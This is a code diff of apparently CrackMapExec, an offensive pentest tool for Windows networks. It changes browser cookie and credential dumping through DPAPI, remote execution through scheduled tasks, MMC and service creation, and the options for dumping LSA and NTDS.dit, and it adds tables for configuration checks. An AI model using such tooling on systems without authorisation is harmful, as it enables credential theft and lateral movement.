||||||
system_credentials = credentials_triage.triage_system_credentials()
|
system_credentials = credentials_triage.triage_system_credentials()
|
||||||
self.logger.debug(f"Triaged System Credentials: {system_credentials}")
|
self.logger.debug(f"Triaged System Credentials: {system_credentials}")
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
|
@ -1593,9 +1608,11 @@ class smb(connection):
|
||||||
credential.target,
|
credential.target,
|
||||||
)
|
)
|
||||||
|
|
||||||
|
browser_credentials = []
|
||||||
|
cookies = []
|
||||||
try:
|
try:
|
||||||
# Collect Chrome Based Browser stored secrets
|
# Collect Chrome Based Browser stored secrets
|
||||||
dump_cookies = True if self.args.dpapi == "cookies" else False
|
dump_cookies = True if "cookies" in self.args.dpapi else False
|
||||||
browser_triage = BrowserTriage(target=target, conn=conn, masterkeys=masterkeys)
|
browser_triage = BrowserTriage(target=target, conn=conn, masterkeys=masterkeys)
|
||||||
browser_credentials, cookies = browser_triage.triage_browsers(gather_cookies=dump_cookies)
|
browser_credentials, cookies = browser_triage.triage_browsers(gather_cookies=dump_cookies)
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
|
@ -1615,9 +1632,11 @@ class smb(connection):
|
||||||
if dump_cookies:
|
if dump_cookies:
|
||||||
self.logger.display("Start Dumping Cookies")
|
self.logger.display("Start Dumping Cookies")
|
||||||
for cookie in cookies:
|
for cookie in cookies:
|
||||||
|
if cookie.cookie_value != '':
|
||||||
self.logger.highlight(f"[{credential.winuser}][{cookie.browser.upper()}] {cookie.host}{cookie.path} - {cookie.cookie_name}:{cookie.cookie_value}")
|
self.logger.highlight(f"[{credential.winuser}][{cookie.browser.upper()}] {cookie.host}{cookie.path} - {cookie.cookie_name}:{cookie.cookie_value}")
|
||||||
self.logger.display("End Dumping Cookies")
|
self.logger.display("End Dumping Cookies")
|
||||||
|
|
||||||
|
vaults = []
|
||||||
try:
|
try:
|
||||||
# Collect User Internet Explorer stored secrets
|
# Collect User Internet Explorer stored secrets
|
||||||
vaults_triage = VaultsTriage(target=target, conn=conn, masterkeys=masterkeys)
|
vaults_triage = VaultsTriage(target=target, conn=conn, masterkeys=masterkeys)
|
||||||
|
@ -1637,6 +1656,7 @@ class smb(connection):
|
||||||
vault.resource,
|
vault.resource,
|
||||||
)
|
)
|
||||||
|
|
||||||
|
firefox_credentials = []
|
||||||
try:
|
try:
|
||||||
# Collect Firefox stored secrets
|
# Collect Firefox stored secrets
|
||||||
firefox_triage = FirefoxTriage(target=target, logger=self.logger, conn=conn)
|
firefox_triage = FirefoxTriage(target=target, logger=self.logger, conn=conn)
|
||||||
|
|
|
@ -2,12 +2,10 @@
|
||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
import os
|
import os
|
||||||
import logging
|
|
||||||
from impacket.dcerpc.v5 import tsch, transport
|
from impacket.dcerpc.v5 import tsch, transport
|
||||||
from impacket.dcerpc.v5.dtypes import NULL
|
from impacket.dcerpc.v5.dtypes import NULL
|
||||||
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_GSS_NEGOTIATE, RPC_C_AUTHN_LEVEL_PKT_PRIVACY
|
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_GSS_NEGOTIATE, RPC_C_AUTHN_LEVEL_PKT_PRIVACY
|
||||||
from cme.helpers.misc import gen_random_string
|
from cme.helpers.misc import gen_random_string
|
||||||
from cme.logger import cme_logger
|
|
||||||
from time import sleep
|
from time import sleep
|
||||||
|
|
||||||
|
|
||||||
|
@ -23,7 +21,9 @@ class TSCH_EXEC:
|
||||||
aesKey=None,
|
aesKey=None,
|
||||||
kdcHost=None,
|
kdcHost=None,
|
||||||
hashes=None,
|
hashes=None,
|
||||||
logger=cme_logger
|
logger=None,
|
||||||
|
tries=None,
|
||||||
|
share=None
|
||||||
):
|
):
|
||||||
self.__target = target
|
self.__target = target
|
||||||
self.__username = username
|
self.__username = username
|
||||||
|
@ -37,6 +37,7 @@ class TSCH_EXEC:
|
||||||
self.__aesKey = aesKey
|
self.__aesKey = aesKey
|
||||||
self.__doKerberos = doKerberos
|
self.__doKerberos = doKerberos
|
||||||
self.__kdcHost = kdcHost
|
self.__kdcHost = kdcHost
|
||||||
|
self.__tries = tries
|
||||||
self.logger = logger
|
self.logger = logger
|
||||||
|
|
||||||
if hashes is not None:
|
if hashes is not None:
|
||||||
|
@ -48,7 +49,7 @@ class TSCH_EXEC:
|
||||||
|
|
||||||
if self.__password is None:
|
if self.__password is None:
|
||||||
self.__password = ""
|
self.__password = ""
|
||||||
cme_logger.debug("test")
|
|
||||||
stringbinding = r"ncacn_np:%s[\pipe\atsvc]" % self.__target
|
stringbinding = r"ncacn_np:%s[\pipe\atsvc]" % self.__target
|
||||||
self.__rpctransport = transport.DCERPCTransportFactory(stringbinding)
|
self.__rpctransport = transport.DCERPCTransportFactory(stringbinding)
|
||||||
|
|
||||||
|
@ -72,15 +73,6 @@ class TSCH_EXEC:
|
||||||
def output_callback(self, data):
|
def output_callback(self, data):
|
||||||
self.__outputBuffer = data
|
self.__outputBuffer = data
|
||||||
|
|
||||||
def execute_handler(self, data):
|
|
||||||
if self.__retOutput:
|
|
||||||
try:
|
|
||||||
self.doStuff(data, fileless=False)
|
|
||||||
except:
|
|
||||||
self.doStuff(data)
|
|
||||||
else:
|
|
||||||
self.doStuff(data)
|
|
||||||
|
|
||||||
def gen_xml(self, command, tmpFileName, fileless=False):
|
def gen_xml(self, command, tmpFileName, fileless=False):
|
||||||
xml = """<?xml version="1.0" encoding="UTF-16"?>
|
xml = """<?xml version="1.0" encoding="UTF-16"?>
|
||||||
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
|
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
|
||||||
|
@ -131,7 +123,7 @@ class TSCH_EXEC:
|
||||||
elif self.__retOutput is False:
|
elif self.__retOutput is False:
|
||||||
argument_xml = f" <Arguments>/C {command}</Arguments>"
|
argument_xml = f" <Arguments>/C {command}</Arguments>"
|
||||||
|
|
||||||
cme_logger.debug("Generated argument XML: " + argument_xml)
|
self.logger.debug("Generated argument XML: " + argument_xml)
|
||||||
xml += argument_xml
|
xml += argument_xml
|
||||||
|
|
||||||
xml += """
|
xml += """
|
||||||
|
@ -141,7 +133,7 @@ class TSCH_EXEC:
|
||||||
"""
|
"""
|
||||||
return xml
|
return xml
|
||||||
|
|
||||||
def doStuff(self, command, fileless=False):
|
def execute_handler(self, command, fileless=False):
|
||||||
dce = self.__rpctransport.get_dce_rpc()
|
dce = self.__rpctransport.get_dce_rpc()
|
||||||
if self.__doKerberos:
|
if self.__doKerberos:
|
||||||
dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
|
dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
|
||||||
|
@ -156,9 +148,9 @@ class TSCH_EXEC:
|
||||||
|
|
||||||
xml = self.gen_xml(command, tmpFileName, fileless)
|
xml = self.gen_xml(command, tmpFileName, fileless)
|
||||||
|
|
||||||
logging.info(f"Task XML: {xml}")
|
self.logger.info(f"Task XML: {xml}")
|
||||||
taskCreated = False
|
taskCreated = False
|
||||||
logging.info(f"Creating task \\{tmpName}")
|
self.logger.info(f"Creating task \\{tmpName}")
|
||||||
try:
|
try:
|
||||||
tsch.hSchRpcRegisterTask(dce, f"\\{tmpName}", xml, tsch.TASK_CREATE, NULL, tsch.TASK_LOGON_NONE)
|
tsch.hSchRpcRegisterTask(dce, f"\\{tmpName}", xml, tsch.TASK_CREATE, NULL, tsch.TASK_LOGON_NONE)
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
|
@ -166,19 +158,19 @@ class TSCH_EXEC:
|
||||||
return
|
return
|
||||||
taskCreated = True
|
taskCreated = True
|
||||||
|
|
||||||
logging.info(f"Running task \\{tmpName}")
|
self.logger.info(f"Running task \\{tmpName}")
|
||||||
tsch.hSchRpcRun(dce, f"\\{tmpName}")
|
tsch.hSchRpcRun(dce, f"\\{tmpName}")
|
||||||
|
|
||||||
done = False
|
done = False
|
||||||
while not done:
|
while not done:
|
||||||
cme_logger.debug(f"Calling SchRpcGetLastRunInfo for \\{tmpName}")
|
self.logger.debug(f"Calling SchRpcGetLastRunInfo for \\{tmpName}")
|
||||||
resp = tsch.hSchRpcGetLastRunInfo(dce, f"\\{tmpName}")
|
resp = tsch.hSchRpcGetLastRunInfo(dce, f"\\{tmpName}")
|
||||||
if resp["pLastRuntime"]["wYear"] != 0:
|
if resp["pLastRuntime"]["wYear"] != 0:
|
||||||
done = True
|
done = True
|
||||||
else:
|
else:
|
||||||
sleep(2)
|
sleep(2)
|
||||||
|
|
||||||
logging.info(f"Deleting task \\{tmpName}")
|
self.logger.info(f"Deleting task \\{tmpName}")
|
||||||
tsch.hSchRpcDelete(dce, f"\\{tmpName}")
|
tsch.hSchRpcDelete(dce, f"\\{tmpName}")
|
||||||
taskCreated = False
|
taskCreated = False
|
||||||
|
|
||||||
|
@ -197,19 +189,27 @@ class TSCH_EXEC:
|
||||||
else:
|
else:
|
||||||
peer = ":".join(map(str, self.__rpctransport.get_socket().getpeername()))
|
peer = ":".join(map(str, self.__rpctransport.get_socket().getpeername()))
|
||||||
smbConnection = self.__rpctransport.get_smb_connection()
|
smbConnection = self.__rpctransport.get_smb_connection()
|
||||||
|
tries = 1
|
||||||
while True:
|
while True:
|
||||||
try:
|
try:
|
||||||
logging.info(f"Attempting to read ADMIN$\\Temp\\{tmpFileName}")
|
self.logger.info(f"Attempting to read ADMIN$\\Temp\\{tmpFileName}")
|
||||||
smbConnection.getFile("ADMIN$", f"Temp\\{tmpFileName}", self.output_callback)
|
smbConnection.getFile("ADMIN$", f"Temp\\{tmpFileName}", self.output_callback)
|
||||||
break
|
break
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
if str(e).find("SHARING") > 0:
|
if tries >= self.__tries:
|
||||||
sleep(3)
|
self.logger.fail(f'ATEXEC: Get output file error, maybe got detected by AV software, please increase the number of tries with the option "--get-output-tries". If it\'s still failing maybe something is blocking the schedule job, try another exec method')
|
||||||
elif str(e).find("STATUS_OBJECT_NAME_NOT_FOUND") >= 0:
|
break
|
||||||
|
if str(e).find("STATUS_BAD_NETWORK_NAME") >0 :
|
||||||
|
self.logger.fail(f'ATEXEC: Get ouput failed, target has blocked ADMIN$ access (maybe command executed!)')
|
||||||
|
break
|
||||||
|
if str(e).find("SHARING") > 0 or str(e).find("STATUS_OBJECT_NAME_NOT_FOUND") >= 0:
|
||||||
sleep(3)
|
sleep(3)
|
||||||
|
tries += 1
|
||||||
else:
|
else:
|
||||||
raise
|
self.logger.debug(str(e))
|
||||||
cme_logger.debug(f"Deleting file ADMIN$\\Temp\\{tmpFileName}")
|
|
||||||
|
if self.__outputBuffer:
|
||||||
|
self.logger.debug(f"Deleting file ADMIN$\\Temp\\{tmpFileName}")
|
||||||
smbConnection.deleteFile("ADMIN$", f"Temp\\{tmpFileName}")
|
smbConnection.deleteFile("ADMIN$", f"Temp\\{tmpFileName}")
|
||||||
|
|
||||||
dce.disconnect()
|
dce.disconnect()
|
||||||
|
|
|
@ -30,6 +30,8 @@ class database:
|
||||||
self.AdminRelationsTable = None
|
self.AdminRelationsTable = None
|
||||||
self.GroupRelationsTable = None
|
self.GroupRelationsTable = None
|
||||||
self.LoggedinRelationsTable = None
|
self.LoggedinRelationsTable = None
|
||||||
|
self.ConfChecksTable = None
|
||||||
|
self.ConfChecksResultsTable = None
|
||||||
self.DpapiBackupkey = None
|
self.DpapiBackupkey = None
|
||||||
self.DpapiSecrets = None
|
self.DpapiSecrets = None
|
||||||
|
|
||||||
|
@ -61,6 +63,27 @@ class database:
|
||||||
"petitpotam" boolean
|
"petitpotam" boolean
|
||||||
)"""
|
)"""
|
||||||
)
|
)
|
||||||
|
db_conn.execute(
|
||||||
|
"""CREATE TABLE "conf_checks" (
|
||||||
|
"id" integer PRIMARY KEY,
|
||||||
|
"name" text,
|
||||||
|
"description" text
|
||||||
|
)"""
|
||||||
|
)
|
||||||
|
|
||||||
|
db_conn.execute(
|
||||||
|
"""CREATE TABLE "conf_checks_results" (
|
||||||
|
"id" integer PRIMARY KEY,
|
||||||
|
"host_id" integer,
|
||||||
|
"check_id" integer,
|
||||||
|
"secure" boolean,
|
||||||
|
"reasons" text,
|
||||||
|
FOREIGN KEY(host_id) REFERENCES hosts(id),
|
||||||
|
FOREIGN KEY(check_id) REFERENCES conf_checks(id)
|
||||||
|
)
|
||||||
|
"""
|
||||||
|
)
|
||||||
|
|
||||||
# type = hash, plaintext
|
# type = hash, plaintext
|
||||||
db_conn.execute(
|
db_conn.execute(
|
||||||
"""CREATE TABLE "users" (
|
"""CREATE TABLE "users" (
|
||||||
|
@ -165,6 +188,8 @@ class database:
|
||||||
self.LoggedinRelationsTable = Table("loggedin_relations", self.metadata, autoload_with=self.db_engine)
|
self.LoggedinRelationsTable = Table("loggedin_relations", self.metadata, autoload_with=self.db_engine)
|
||||||
self.DpapiSecrets = Table("dpapi_secrets", self.metadata, autoload_with=self.db_engine)
|
self.DpapiSecrets = Table("dpapi_secrets", self.metadata, autoload_with=self.db_engine)
|
||||||
self.DpapiBackupkey = Table("dpapi_backupkey", self.metadata, autoload_with=self.db_engine)
|
self.DpapiBackupkey = Table("dpapi_backupkey", self.metadata, autoload_with=self.db_engine)
|
||||||
|
self.ConfChecksTable = Table("conf_checks", self.metadata, autoload_with=self.db_engine)
|
||||||
|
self.ConfChecksResultsTable = Table("conf_checks_results", self.metadata, autoload_with=self.db_engine)
|
||||||
except (NoInspectionAvailable, NoSuchTableError):
|
except (NoInspectionAvailable, NoSuchTableError):
|
||||||
print(
|
print(
|
||||||
f"""
|
f"""
|
||||||
|
@ -870,3 +895,71 @@ class database:
|
||||||
elif host_id:
|
elif host_id:
|
||||||
q = q.filter(self.LoggedinRelationsTable.c.hostid == host_id)
|
q = q.filter(self.LoggedinRelationsTable.c.hostid == host_id)
|
||||||
self.conn.execute(q)
|
self.conn.execute(q)
|
||||||
|
|
||||||
|
def get_checks(self):
|
||||||
|
q = select(self.ConfChecksTable)
|
||||||
|
return self.conn.execute(q).all()
|
||||||
|
|
||||||
|
def get_check_results(self):
|
||||||
|
q = select(self.ConfChecksResultsTable)
|
||||||
|
return self.conn.execute(q).all()
|
||||||
|
|
||||||
|
def insert_data(self, table, select_results=[], **new_row):
|
||||||
|
"""
|
||||||
|
Insert a new row in the given table.
|
||||||
|
Basically it's just a more generic version of add_host
|
||||||
|
"""
|
||||||
|
results = []
|
||||||
|
updated_ids = []
|
||||||
|
|
||||||
|
# Create new row
|
||||||
|
if not select_results:
|
||||||
|
results = [new_row]
|
||||||
|
# Update existing row data
|
||||||
|
else:
|
||||||
|
for row in select_results:
|
||||||
|
row_data = row._asdict()
|
||||||
|
for column,value in new_row.items():
|
||||||
|
row_data[column] = value
|
||||||
|
|
||||||
|
# Only add data to be updated if it has changed
|
||||||
|
if row_data not in results:
|
||||||
|
results.append(row_data)
|
||||||
|
updated_ids.append(row_data['id'])
|
||||||
|
|
||||||
|
cme_logger.debug(f'Update data: {results}')
|
||||||
|
# TODO: find a way to abstract this away to a single Upsert call
|
||||||
|
q = Insert(table) # .returning(table.c.id)
|
||||||
|
update_column = {col.name: col for col in q.excluded if col.name not in 'id'}
|
||||||
|
q = q.on_conflict_do_update(index_elements=table.primary_key, set_=update_column)
|
||||||
|
self.conn.execute(q, results) # .scalar()
|
||||||
|
# we only return updated IDs for now - when RETURNING clause is allowed we can return inserted
|
||||||
|
return updated_ids
|
||||||
|
|
||||||
|
def add_check(self, name, description):
|
||||||
|
"""
|
||||||
|
Check if this check item has already been added to the database, if not, add it in.
|
||||||
|
"""
|
||||||
|
q = select(self.ConfChecksTable).filter(self.ConfChecksTable.c.name == name)
|
||||||
|
select_results = self.conn.execute(q).all()
|
||||||
|
context = locals()
|
||||||
|
new_row = dict(((column, context[column]) for column in ('name', 'description')))
|
||||||
|
updated_ids = self.insert_data(self.ConfChecksTable, select_results, **new_row)
|
||||||
|
|
||||||
|
if updated_ids:
|
||||||
|
cme_logger.debug(f"add_check() - Checks IDs Updated: {updated_ids}")
|
||||||
|
return updated_ids
|
||||||
|
|
||||||
|
def add_check_result(self, host_id, check_id, secure, reasons):
|
||||||
|
"""
|
||||||
|
Check if this check result has already been added to the database, if not, add it in.
|
||||||
|
"""
|
||||||
|
q = select(self.ConfChecksResultsTable).filter(self.ConfChecksResultsTable.c.host_id == host_id, self.ConfChecksResultsTable.c.check_id == check_id)
|
||||||
|
select_results = self.conn.execute(q).all()
|
||||||
|
context = locals()
|
||||||
|
new_row = dict(((column, context[column]) for column in ('host_id', 'check_id', 'secure', 'reasons')))
|
||||||
|
updated_ids = self.insert_data(self.ConfChecksResultsTable, select_results, **new_row)
|
||||||
|
|
||||||
|
if updated_ids:
|
||||||
|
cme_logger.debug(f"add_check_result() - Check Results IDs Updated: {updated_ids}")
|
||||||
|
return updated_ids
|
||||||
|
|
|
@ -3,7 +3,11 @@
|
||||||
|
|
||||||
from cme.helpers.misc import validate_ntlm
|
from cme.helpers.misc import validate_ntlm
|
||||||
from cme.cmedb import DatabaseNavigator, print_table, print_help
|
from cme.cmedb import DatabaseNavigator, print_table, print_help
|
||||||
|
from termcolor import colored
|
||||||
|
import functools
|
||||||
|
|
||||||
|
help_header = functools.partial(colored, color='cyan', attrs=['bold'])
|
||||||
|
help_kw = functools.partial(colored, color='green', attrs=['bold'])
|
||||||
|
|
||||||
class navigator(DatabaseNavigator):
|
class navigator(DatabaseNavigator):
|
||||||
def display_creds(self, creds):
|
def display_creds(self, creds):
|
||||||
|
@ -356,6 +360,84 @@ class navigator(DatabaseNavigator):
|
||||||
|
|
||||||
print_table(data, title="Credential(s) with Admin Access")
|
print_table(data, title="Credential(s) with Admin Access")
|
||||||
|
|
||||||
|
def do_wcc(self, line):
|
||||||
|
valid_columns = {
|
||||||
|
'ip':'IP',
|
||||||
|
'hostname':'Hostname',
|
||||||
|
'check':'Check',
|
||||||
|
'description':'Description',
|
||||||
|
'status':'Status',
|
||||||
|
'reasons':'Reasons'
|
||||||
|
}
|
||||||
|
|
||||||
|
line = line.strip()
|
||||||
|
|
||||||
|
if line.lower() == 'full':
|
||||||
|
columns_to_display = list(valid_columns.values())
|
||||||
|
else:
|
||||||
|
requested_columns = line.split(' ')
|
||||||
|
columns_to_display = list(valid_columns[column.lower()] for column in requested_columns if column.lower() in valid_columns)
|
||||||
|
|
||||||
|
results = self.db.get_check_results()
|
||||||
|
self.display_wcc_results(results, columns_to_display)
|
||||||
|
|
||||||
|
def display_wcc_results(self, results, columns_to_display=None):
|
||||||
|
data = [
|
||||||
|
[
|
||||||
|
"IP",
|
||||||
|
"Hostname",
|
||||||
|
"Check",
|
||||||
|
"Status"
|
||||||
|
]
|
||||||
|
]
|
||||||
|
if columns_to_display:
|
||||||
|
data = [columns_to_display]
|
||||||
|
|
||||||
|
checks = self.db.get_checks()
|
||||||
|
checks_dict = {}
|
||||||
|
for check in checks:
|
||||||
|
check = check._asdict()
|
||||||
|
checks_dict[check['id']] = check
|
||||||
|
|
||||||
|
for (result_id, host_id, check_id, secure, reasons) in results:
|
||||||
|
status = 'OK' if secure else 'KO'
|
||||||
|
host = self.db.get_hosts(host_id)[0]._asdict()
|
||||||
|
check = checks_dict[check_id]
|
||||||
|
row = []
|
||||||
|
for column in data[0]:
|
||||||
|
if column == 'IP':
|
||||||
|
row.append(host['ip'])
|
||||||
|
if column == 'Hostname':
|
||||||
|
row.append(host['hostname'])
|
||||||
|
if column == 'Check':
|
||||||
|
row.append(check['name'])
|
||||||
|
if column == 'Description':
|
||||||
|
row.append(check['description'])
|
||||||
|
if column == 'Status':
|
||||||
|
row.append(status)
|
||||||
|
if column == 'Reasons':
|
||||||
|
row.append(reasons)
|
||||||
|
data.append(row)
|
||||||
|
|
||||||
|
print_table(data, title="Windows Configuration Checks")
|
||||||
|
|
||||||
|
def help_wcc(self):
|
||||||
|
help_string = f"""
|
||||||
|
{help_header('USAGE')}
|
||||||
|
{help_header('wcc')} [{help_kw('full')}]
|
||||||
|
{help_header('wcc')} <{help_kw('ip')}|{help_kw('hostname')}|{help_kw('check')}|{help_kw('description')}|{help_kw('status')}|{help_kw('reasons')}>...
|
||||||
|
|
||||||
|
{help_header('DESCRIPTION')}
|
||||||
|
Display Windows Configuration Checks results
|
||||||
|
|
||||||
|
{help_header('wcc')} [{help_kw('full')}]
|
||||||
|
If full is provided, display all columns. Otherwise, display IP, Hostname, Check and Status
|
||||||
|
|
||||||
|
{help_header('wcc')} <{help_kw('ip')}|{help_kw('hostname')}|{help_kw('check')}|{help_kw('description')}|{help_kw('status')}|{help_kw('reasons')}>...
|
||||||
|
Display only the requested columns (case-insensitive)
|
||||||
|
"""
|
||||||
|
print_help(help_string)
|
||||||
|
|
||||||
def help_hosts(self):
|
def help_hosts(self):
|
||||||
help_string = """
|
help_string = """
|
||||||
hosts [dc|spooler|zerologon|petitpotam|filter_term]
|
hosts [dc|spooler|zerologon|petitpotam|filter_term]
|
||||||
|
|
|
@ -27,7 +27,6 @@
|
||||||
# getInterface() method
|
# getInterface() method
|
||||||
#
|
#
|
||||||
|
|
||||||
import logging
|
|
||||||
from os.path import join as path_join
|
from os.path import join as path_join
|
||||||
from time import sleep
|
from time import sleep
|
||||||
from cme.helpers.misc import gen_random_string
|
from cme.helpers.misc import gen_random_string
|
||||||
|
@ -60,7 +59,7 @@ from impacket.dcerpc.v5.dtypes import NULL
|
||||||
|
|
||||||
|
|
||||||
class MMCEXEC:
|
class MMCEXEC:
|
||||||
def __init__(self, host, share_name, username, password, domain, smbconnection, share, hashes=None):
|
def __init__(self, host, share_name, username, password, domain, smbconnection, share, hashes=None, logger=None, tries=None):
|
||||||
self.__host = host
|
self.__host = host
|
||||||
self.__username = username
|
self.__username = username
|
||||||
self.__password = password
|
self.__password = password
|
||||||
|
@ -78,8 +77,14 @@ class MMCEXEC:
|
||||||
self.__retOutput = True
|
self.__retOutput = True
|
||||||
self.__share = share
|
self.__share = share
|
||||||
self.__dcom = None
|
self.__dcom = None
|
||||||
|
self.__tries = tries
|
||||||
|
self.logger = logger
|
||||||
|
|
||||||
if hashes is not None:
|
if hashes is not None:
|
||||||
|
if hashes.find(":") != -1:
|
||||||
self.__lmhash, self.__nthash = hashes.split(":")
|
self.__lmhash, self.__nthash = hashes.split(":")
|
||||||
|
else:
|
||||||
|
self.__nthash = hashes
|
||||||
|
|
||||||
self.__dcom = DCOMConnection(
|
self.__dcom = DCOMConnection(
|
||||||
self.__host,
|
self.__host,
|
||||||
|
@ -118,7 +123,7 @@ class MMCEXEC:
|
||||||
|
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
self.exit()
|
self.exit()
|
||||||
logging.error(str(e))
|
self.logger.fail(str(e))
|
||||||
self.__dcom.disconnect()
|
self.__dcom.disconnect()
|
||||||
|
|
||||||
def getInterface(self, interface, resp):
|
def getInterface(self, interface, resp):
|
||||||
|
@ -134,7 +139,7 @@ class MMCEXEC:
|
||||||
elif objRefType == FLAGS_OBJREF_EXTENDED:
|
elif objRefType == FLAGS_OBJREF_EXTENDED:
|
||||||
objRef = OBJREF_EXTENDED(b"".join(resp))
|
objRef = OBJREF_EXTENDED(b"".join(resp))
|
||||||
else:
|
else:
|
||||||
logging.error("Unknown OBJREF Type! 0x%x" % objRefType)
|
self.logger.fail("Unknown OBJREF Type! 0x%x" % objRefType)
|
||||||
|
|
||||||
return IRemUnknown2(
|
return IRemUnknown2(
|
||||||
INTERFACE(
|
INTERFACE(
|
||||||
|
@ -226,17 +231,26 @@ class MMCEXEC:
|
||||||
if self.__retOutput is False:
|
if self.__retOutput is False:
|
||||||
self.__outputBuffer = ""
|
self.__outputBuffer = ""
|
||||||
return
|
return
|
||||||
|
tries = 1
|
||||||
while True:
|
while True:
|
||||||
try:
|
try:
|
||||||
|
self.logger.info(f"Attempting to read {self.__share}\\{self.__output}")
|
||||||
self.__smbconnection.getFile(self.__share, self.__output, self.output_callback)
|
self.__smbconnection.getFile(self.__share, self.__output, self.output_callback)
|
||||||
break
|
break
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
if str(e).find("STATUS_SHARING_VIOLATION") >= 0:
|
if tries >= self.__tries:
|
||||||
|
self.logger.fail(f'MMCEXEC: Get output file error, maybe got detected by AV software, please increase the number of tries with the option "--get-output-tries". If it\'s still failing maybe something is blocking the schedule job, try another exec method')
|
||||||
|
break
|
||||||
|
if str(e).find("STATUS_BAD_NETWORK_NAME") >0 :
|
||||||
|
self.logger.fail(f'MMCEXEC: Get ouput failed, target has blocked {self.__share} access (maybe command executed!)')
|
||||||
|
break
|
||||||
|
if str(e).find("STATUS_SHARING_VIOLATION") >= 0 or str(e).find("STATUS_OBJECT_NAME_NOT_FOUND") >= 0:
|
||||||
# Output not finished, let's wait
|
# Output not finished, let's wait
|
||||||
sleep(2)
|
sleep(2)
|
||||||
pass
|
tries += 1
|
||||||
else:
|
else:
|
||||||
pass
|
self.logger.debug(str(e))
|
||||||
|
|
||||||
|
if self.__outputBuffer:
|
||||||
|
self.logger.debug(f"Deleting file {self.__share}\\{self.__output}")
|
||||||
self.__smbconnection.deleteFile(self.__share, self.__output)
|
self.__smbconnection.deleteFile(self.__share, self.__output)
|
|
@ -19,8 +19,8 @@ def proto_args(parser, std_parser, module_parser):
|
||||||
cgroup.add_argument("--lsa", action="store_true", help="dump LSA secrets from target systems")
|
cgroup.add_argument("--lsa", action="store_true", help="dump LSA secrets from target systems")
|
||||||
cgroup.add_argument("--ntds", choices={"vss", "drsuapi"}, nargs="?", const="drsuapi",
|
cgroup.add_argument("--ntds", choices={"vss", "drsuapi"}, nargs="?", const="drsuapi",
|
||||||
help="dump the NTDS.dit from target DCs using the specifed method\n(default: drsuapi)")
|
help="dump the NTDS.dit from target DCs using the specifed method\n(default: drsuapi)")
|
||||||
cgroup.add_argument("--dpapi", choices={"password", "cookies"}, nargs="?", const="password",
|
cgroup.add_argument("--dpapi", choices={"cookies","nosystem"}, nargs="*",
|
||||||
help="dump DPAPI secrets from target systems, can dump cookies if you add \"cookies\"\n(default: password)")
|
help="dump DPAPI secrets from target systems, can dump cookies if you add \"cookies\", will not dump SYSTEM dpapi if you add nosystem\n")
|
||||||
# cgroup.add_argument("--ntds-history", action='store_true', help='Dump NTDS.dit password history')
|
# cgroup.add_argument("--ntds-history", action='store_true', help='Dump NTDS.dit password history')
|
||||||
# cgroup.add_argument("--ntds-pwdLastSet", action='store_true', help='Shows the pwdLastSet attribute for each NTDS.dit account')
|
# cgroup.add_argument("--ntds-pwdLastSet", action='store_true', help='Shows the pwdLastSet attribute for each NTDS.dit account')
|
||||||
|
|
||||||
|
@ -79,6 +79,8 @@ def proto_args(parser, std_parser, module_parser):
|
||||||
cgroup = smb_parser.add_argument_group("Command Execution", "Options for executing commands")
|
cgroup = smb_parser.add_argument_group("Command Execution", "Options for executing commands")
|
||||||
cgroup.add_argument("--exec-method", choices={"wmiexec", "mmcexec", "smbexec", "atexec"}, default=None,
|
cgroup.add_argument("--exec-method", choices={"wmiexec", "mmcexec", "smbexec", "atexec"}, default=None,
|
||||||
help="method to execute the command. Ignored if in MSSQL mode (default: wmiexec)")
|
help="method to execute the command. Ignored if in MSSQL mode (default: wmiexec)")
|
||||||
|
cgroup.add_argument("--wmiexec-timeout", help="WMIEXEC connection timeout, default is 5 secondes", type=int, default=5)
|
||||||
|
cgroup.add_argument("--get-output-tries", help="Number of times atexec/smbexec/mmcexec tries to get results, default is 5", type=int, default=5)
|
||||||
cgroup.add_argument("--codec", default="utf-8",
|
cgroup.add_argument("--codec", default="utf-8",
|
||||||
help="Set encoding used (codec) from the target's output (default "
|
help="Set encoding used (codec) from the target's output (default "
|
||||||
"\"utf-8\"). If errors are detected, run chcp.com at the target, "
|
"\"utf-8\"). If errors are detected, run chcp.com at the target, "
|
||||||
|
|
|
@ -6,7 +6,6 @@ from os.path import join as path_join
|
||||||
from time import sleep
|
from time import sleep
|
||||||
from impacket.dcerpc.v5 import transport, scmr
|
from impacket.dcerpc.v5 import transport, scmr
|
||||||
from cme.helpers.misc import gen_random_string
|
from cme.helpers.misc import gen_random_string
|
||||||
from cme.logger import cme_logger
|
|
||||||
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_GSS_NEGOTIATE
|
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_GSS_NEGOTIATE
|
||||||
|
|
||||||
|
|
||||||
|
@ -26,7 +25,8 @@ class SMBEXEC:
|
||||||
hashes=None,
|
hashes=None,
|
||||||
share=None,
|
share=None,
|
||||||
port=445,
|
port=445,
|
||||||
logger=cme_logger
|
logger=None,
|
||||||
|
tries=None
|
||||||
):
|
):
|
||||||
self.__host = host
|
self.__host = host
|
||||||
self.__share_name = "C$"
|
self.__share_name = "C$"
|
||||||
|
@ -51,6 +51,7 @@ class SMBEXEC:
|
||||||
self.__aesKey = aesKey
|
self.__aesKey = aesKey
|
||||||
self.__doKerberos = doKerberos
|
self.__doKerberos = doKerberos
|
||||||
self.__kdcHost = kdcHost
|
self.__kdcHost = kdcHost
|
||||||
|
self.__tries = tries
|
||||||
self.logger = logger
|
self.logger = logger
|
||||||
|
|
||||||
if hashes is not None:
|
if hashes is not None:
|
||||||
|
@ -126,6 +127,8 @@ class SMBEXEC:
|
||||||
self.logger.debug("Command to execute: " + command)
|
self.logger.debug("Command to execute: " + command)
|
||||||
|
|
||||||
self.logger.debug(f"Remote service {self.__serviceName} created.")
|
self.logger.debug(f"Remote service {self.__serviceName} created.")
|
||||||
|
|
||||||
|
try:
|
||||||
resp = scmr.hRCreateServiceW(
|
